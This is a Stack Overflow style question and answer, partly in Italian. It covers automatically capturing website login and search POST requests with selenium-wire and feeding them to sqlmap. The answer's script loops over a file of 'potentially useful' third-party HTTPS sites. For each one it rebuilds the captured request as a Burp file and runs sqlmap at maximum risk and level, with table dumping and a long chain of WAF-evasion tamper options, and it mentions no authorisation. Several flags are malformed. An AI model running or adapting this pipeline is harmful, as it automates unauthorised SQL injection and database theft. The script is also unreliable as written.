# Python automatically captures requests with selenium and requests_toolbelt as burp

Tags: python, selenium, request, burp

I am working on a project: I have a url of an https login page, the idea is to use selenium to click on the "login" button in order to make a call to the authentication server, and then take the data I have put below with requests_toolbelt.
I did some tests and I can press the button with selenium, and I can capture the request with requests_toolbelt, but unfortunately I can't get them to work together
Basically I'm trying to capture a request as a burp suite, but I want to do it in a fully automated way.
Thank you all

```
POST /login HTTP/1.1
Host:
User-Agent: 
Accept: 
Accept-Language: 
Accept-Encoding:
Content-Type: 
Content-Length: 
Origin: 
Connection: 
Referer:
Cookie:
Upgrade-Insecure-Requests:
utf8=
```

This is the code for pressing the button with selenium:

```
 from selenium import webdriver
 from requests_toolbelt.utils import dump
 driver = webdriver.Firefox()
 url="https://myUrl.com/login"
 driver.get(url)
 driver.find_element_by_name("login").click()
```

Questo è il codice di esempio per catturare una request

```
import requests
from requests_toolbelt.utils import dump
from selenium import webdriver
driver = webdriver.Firefox()
url="https://myUrl.com/login"
driver.get(url)
resp = requests.get(driver.current_url)
data = dump.dump_all(resp)
print(data.decode('utf-8'))
```

Comment: It's not clear what you are trying to do.  Did you want to sort of man-in-the-middle the request after clicking the button?  (click button, intercept request, modify request, send request?)  BTW, be very careful when including tokens in your post.

Comment: No, no man in the middle, the idea is to get a request as per the burp suite, and then feed it to sql-map which manages to process and test it independently.
up to now I used burp-suite to capture the request with all the data I described before and then I saved them in a file for sql-map. but now I'd like to automate this mechanism

Comment: OK, so basically you want to run the request in parallel... Wire Shark seems suited for that.  I've also seen some people using "Selenium-Wire" for this kind of thing.    OR if you are using Selenium 4, you might check into the new Bidi interface (still in development)The "NetworkInterceptor": https://www.selenium.dev/documentation/webdriver/bidirectional/bidi_api/#network-interception

Comment: thank you very much you are very kind, I will absolutely try. sorry if i put a few details but it is my first question about stackoverflow

Answer (score 1):

The advice I was given was very helpful.
As I have seen in some online forums that other people have the same problem as me, I publish the whole block of code that manages to acquire calls as it does burp in a fully automated way with selenium-wire, and that manages to launch sqlmap.
the code is very crude and there are some things to file (such as not going to overwrite the results found by sqlmap if you are testing multiple url's of a single domain, since it saves the results with the domain name)

thanks to all and I hope it will be useful to someone

```
# sqlMap
def sqlInjection_sqlmap():  # necessita di file burp che cattura la chiamata al sito

    print("Inizio a fare sql injection tramite sqlmap con \"sqlInjection_sqlmap()\"")
    with open("/root/PycharmProjects/unione/Risultati/InfoSiti/siti_potenzialmente_utili_HTTPS.txt") as file:
        while True:
            line = file.readline()
            if not line:
                break
            print(line)
            if chiamata(line)==True:
                subprocess.call(
                    ["/root/PycharmProjects/unione/Tool/sqlmap-dev/sqlmap.py", "-r",
                     "/root/PycharmProjects/unione/Risultati/InfoSiti/burp.txt",
                     "–tables", "-v", "3", "--risk=3", "--level=5", "–dump", "--answer=\"follow=Y\"", "--batch",
                     "tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes","--force-ssl","--flush-session",
                     "--output-dir=/root/PycharmProjects/unione/Risultati/SqlInjection"])
                print("ciao")
#tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
#--force-ssl
# --flush-session
    fine(sqlInjection_sqlmap.__name__)

# creazione chiamata come BURP
def chiamata(url):
    from seleniumwire import webdriver  # Import from seleniumwire
    open("/root/PycharmProjects/unione/Risultati/InfoSiti/chiamata.txt", 'w').close()
    file_request = open("/root/PycharmProjects/unione/Risultati/InfoSiti/chiamata.txt", 'a')
    options = {
        'request_storage': 'memory',
        'request_storage_max_size': 10  # Non archiviare più di 100 richieste in memoria
    }

    name_list = ["cerca", "cerca-btn", "cercabtn", "btncerca", "btnCerca", "btn-cerca", "cercaBtn", "cerca-button",
                 "search", "search-btn", "searchbtn", "btnsearch", "btnSearch", "btn-search"    "searchBtn", "search-button",
                 "login", "login-btn", "loginbtn", "btnlogin", "btnLogin", "btn-login", "loginBtn", "login-button",
                 "go", "go-btn", "gobtn", "btngo", "btnGo", "go-button", "goBtn", "go-button",
                 "enter", "enter-btn", "enterbtn", "btnenter", "btnEnter", "enter-button", "enterBtn", "enter-button",
                 "btn",
                 "button"
                 ]
    driver = webdriver.Firefox(seleniumwire_options=options)
    driver.get(url)
    a = False
    for id in name_list:
        if a == False:
            try:
                print(id)
                driver.find_element_by_name(id).click()
                a = True
                print(a, "\n")
                break
            except:
                'break'
            print(a)
        if a == False:
            try:
                print(id)
                driver.find_element_by_id(id).click()
                a = True
                print(a, "\n")
                break
            except:
                'break'
            print(a)

    if a == True:
        print("\n")
        i = 0
        for request in driver.requests:
            i = i + 1
            if request.response:
                print(i,
                      "REQUEST-----------------------------",
                      driver.requests,
                      "\n", "\n", "\n", "\n", "\n", "\n", "\n", "\n"
                      )
                file_request.write("""{}
""".format(driver.requests))

        driver.close()
        if pulisciChiamata(url) == True:
            return True
    else:
        print("url non raggiungibile o sbagliata")
        driver.close()
        return False

def pulisciChiamata(url):
    #import requests
    open("/root/PycharmProjects/unione/Risultati/InfoSiti/chiamataPulita.txt", 'w').close()
    file_request_pulito = open("//root/PycharmProjects/unione/Risultati/InfoSiti/chiamataPulita.txt", 'w')
    print("Inizio file")
    with open("/root/PycharmProjects/unione/Risultati/InfoSiti/chiamata.txt") as file:
            line = file.readline()
            line = line.replace("Request(method=","\nRequest(method=")
            file_request_pulito.write(line)
    file_request_pulito.close()

    print("Inizio file perfetto")
    open("/root/PycharmProjects/unione/Risultati/InfoSiti/chiamataPulita2.txt", 'w').close()
    file_request_pulitoperfetto = open("/root/PycharmProjects/unione/Risultati/InfoSiti/chiamataPulita2.txt", 'a')
    with open("/root/PycharmProjects/unione/Risultati/InfoSiti/chiamataPulita.txt") as file:
        while True:
            line = file.readline()
            if not line:
                break
            chiamata=re.findall(r"Request\(method=\'POST\'.*\,",line)

            if chiamata is not None:
                for c in chiamata:
                    file_request_pulitoperfetto.write(c)
                    file_request_pulitoperfetto.write("\n")
                    break
    file_request_pulitoperfetto.close()
    if write_burp_request(url) == True:
        return True

def write_burp_request(url):
    import urllib.parse
    print("Inizio file burp")
    open("/root/PycharmProjects/unione/Risultati/InfoSiti/burp.txt", 'w').close()
    burp = open("/root/PycharmProjects/unione/Risultati/InfoSiti/burp.txt", 'w')
    url_parametro = url
    parsed_url = urllib.parse.urlparse(url_parametro)

    print("Host name: ", parsed_url.netloc)
    print("path: ", parsed_url.path)

    with open("/root/PycharmProjects/unione/Risultati/InfoSiti/chiamataPulita2.txt") as file:
        while True:
            line = file.readline()
            line = line.replace("('", "\n('")
            print(line)
            cazzo = "POST " + parsed_url.path + " HTTP/1.1"
            cazzo= cazzo.replace("\n","")
            print(cazzo)
            host = "host: " + parsed_url.netloc
            user_agent=re.findall(r".ser-.gent', .*\'", line.strip())
            accept=re.findall(r".ccept', .*\'", line.strip())
            accept_language=re.findall(r".ccept-.anguage', .*\'", line.strip())
            accept_encoding=re.findall(r".ccept-.ncoding', .*\'", line.strip())
            content_type=re.findall(r".ontent-.ype', .*\'", line.strip())
            content_length=re.findall(r".ontent-.ength', .*\'", line.strip())
            origin=re.findall(r".rigin', .*\'", line.strip())
            connection=re.findall(r".onnection', .*\'", line.strip())
            referer=re.findall(r".eferer', .*\'", line.strip())
            cookie=re.findall(r".ookie', .*\'", line.strip())
            utf=re.findall(r"utf8.*\'", line.strip())


            burp.write(cazzo)
            burp.write("\n")
            burp.write(str(host).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(user_agent).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(accept).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(accept_language).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(accept_encoding).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(content_type).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(content_length).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(origin).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(connection).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(referer).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(cookie).replace("[\"","").replace("'\"]","").replace("', '",": "))
            burp.write("\n")
            burp.write(str(utf).replace("[\"","").replace("'\"]","").replace("', '",": "))
            return True
            break
    burp.close()
```